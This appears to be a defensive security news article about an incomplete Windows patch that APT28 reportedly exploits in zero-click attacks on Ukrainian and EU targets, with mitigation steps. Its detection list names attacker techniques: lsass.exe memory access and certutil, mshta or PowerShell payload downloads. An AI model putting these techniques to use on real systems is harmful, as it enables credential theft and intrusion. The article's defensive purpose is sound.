Incomplete Windows Patch Leaves Zero-Click Attack Surface for APT28
A Microsoft Windows vulnerability that was previously addressed in a Patch Tuesday update has been found to be incompletely remediated, leaving a residual attack surface that Russia-linked APT28 (also tracked as Fancy Bear, Forest Blizzard, and STRONTIUM) has actively exploited in zero-click attacks against targets in Ukraine and European Union member countries.
SecurityWeek reported the incomplete patch finding, noting that APT28 has weaponized the residual flaw to achieve code execution on target systems without requiring any user interaction — a particularly dangerous attack vector that bypasses user-awareness training and most social engineering defenses.
What Is an Incomplete Patch?
An incomplete patch occurs when a security fix addresses the specific proof-of-concept exploit or reported attack vector but fails to fully remediate the underlying vulnerability. In practice, this means:
- The original CVE is marked as patched in Microsoft's advisory
- Security teams may deprioritize further action, believing the risk is resolved
- Attackers analyze the patch and identify variant attack paths that bypass the fix
- The residual vulnerability is exploited under a new or existing CVE
Incomplete patches are a known challenge in software security. NIST's National Vulnerability Database tracks many re-opened or variant CVEs year over year, and state-sponsored threat actors specifically invest in patch diffing — analyzing the difference between patched and unpatched binaries to find bypass opportunities.
APT28: Threat Actor Profile
APT28 (Advanced Persistent Threat 28) is a Russian military intelligence (GRU) cyber unit, widely attributed to Unit 26165 of the GRU. The group has been active since at least 2004 and is among the most sophisticated state-sponsored threat actors tracked by Western intelligence agencies:
| Attribute | Value |
|---|---|
| Also Known As | Fancy Bear, Forest Blizzard, STRONTIUM, Sofacy |
| Attributed To | Russian GRU Unit 26165 |
| Primary Objectives | Espionage, intelligence collection, election interference |
| Key Targets | NATO members, Ukraine, defense contractors, governments |
| Notable Operations | DNC hack (2016), Bundestag hack (2015), Olympic Anti-Doping Agency (2016) |
| Preferred Vectors | Spear phishing, zero-days, credential theft, exploit of public-facing apps |
In the context of the ongoing Russia-Ukraine conflict, APT28 has dramatically accelerated operations targeting Ukrainian government institutions, military logistics, and EU member state governments that support Ukraine.
Zero-Click Attack Explained
A zero-click attack is a cyberattack that achieves code execution on a target device without any action from the victim. Unlike phishing, which requires a user to click a link or open a file, zero-click exploits trigger automatically when:
- A malicious network packet is received
- A specially crafted file is processed by a background service
- A message is previewed (not opened) in a messaging or email client
Zero-click vulnerabilities are among the most sought-after by nation-state actors because they:
- Bypass user training — no amount of phishing awareness prevents exploitation
- Leave minimal forensic traces — no user action means fewer logs to detect
- Enable mass targeting — can be deployed at scale against IP ranges or email lists without interaction
APT28's exploitation of the incomplete Windows patch reportedly enables code execution via a specially crafted network packet or file processed by a Windows component — with no requirement for the victim to open attachments or click links.
Targets: Ukraine and EU Member States
APT28's current campaign using this incomplete Windows patch has been directed at:
- Ukrainian government agencies and military-adjacent organizations — consistent with APT28's sustained intelligence-collection mandate against Ukraine
- EU member state government entities — particularly those involved in coordination of military aid, sanctions enforcement, or diplomatic communications related to Ukraine
- Defense contractors and logistics companies supplying Ukraine
The timing aligns with increased Russian intelligence collection pressure ahead of major EU policy decisions on Ukraine-related sanctions packages and military aid commitments.
Microsoft's Response
Microsoft is aware of APT28's exploitation of the incomplete patch. Organizations should:
- Apply all pending Windows updates immediately — Microsoft typically releases supplementary fixes when incomplete patches are identified; confirm all April 2026 and subsequent Patch Tuesday updates are installed
- Monitor for out-of-band emergency patches — Microsoft may release emergency updates outside of Patch Tuesday cycle for actively exploited critical flaws
- Enable Windows Defender Credential Guard and Attack Surface Reduction rules — defense-in-depth measures that can reduce exploitation impact
- Review network logs for anomalous SMB, MSHTML, or RPC traffic — common Windows protocol vectors exploited in zero-click scenarios
What Organizations Should Do Now
Immediate Actions
- Verify patch status — Confirm that all April 2026 Windows updates are installed across all Windows endpoints and servers; check Windows Update history for any failed or pending updates
- Prioritize high-value targets — Governments, defense contractors, and organizations with Ukraine-related operations should treat this as critical priority given APT28's known targeting
- Enable enhanced logging — Activate Windows Event Forwarding and Sysmon to capture process creation, network connections, and file modification events that may indicate exploitation
- Implement network segmentation — Limit lateral movement opportunity by segmenting Windows systems handling sensitive data
- Coordinate with national CERTs — Organizations in EU member states should coordinate with their national Computer Emergency Response Teams, which may have additional intelligence on APT28's indicators of compromise
Detection Guidance
APT28 exploitation of Windows vulnerabilities typically leaves indicators including:
- Unusual
lsass.exememory access events - Unexpected outbound connections to infrastructure in Eastern Europe
- New scheduled tasks or services created around the time of exploitation
- Anomalous use of
certutil.exe,mshta.exe, or PowerShell for staged payload downloads
Key Takeaways
- A previously issued Windows patch was incompletely remediated, leaving a residual flaw that APT28 has weaponized for zero-click attacks
- APT28 (Russian GRU) has exploited the bypass against Ukraine and EU member state government targets — consistent with sustained Russian intelligence collection operations
- Zero-click exploits require no user action, making this attack vector particularly dangerous and bypassing user-awareness defenses
- Microsoft is expected to release a supplementary fix; organizations should apply all Windows updates immediately and monitor for emergency out-of-band patches
- High-risk organizations — governments, defense contractors, and Ukraine-adjacent entities — should treat this as a critical priority and engage national CERTs for additional threat intelligence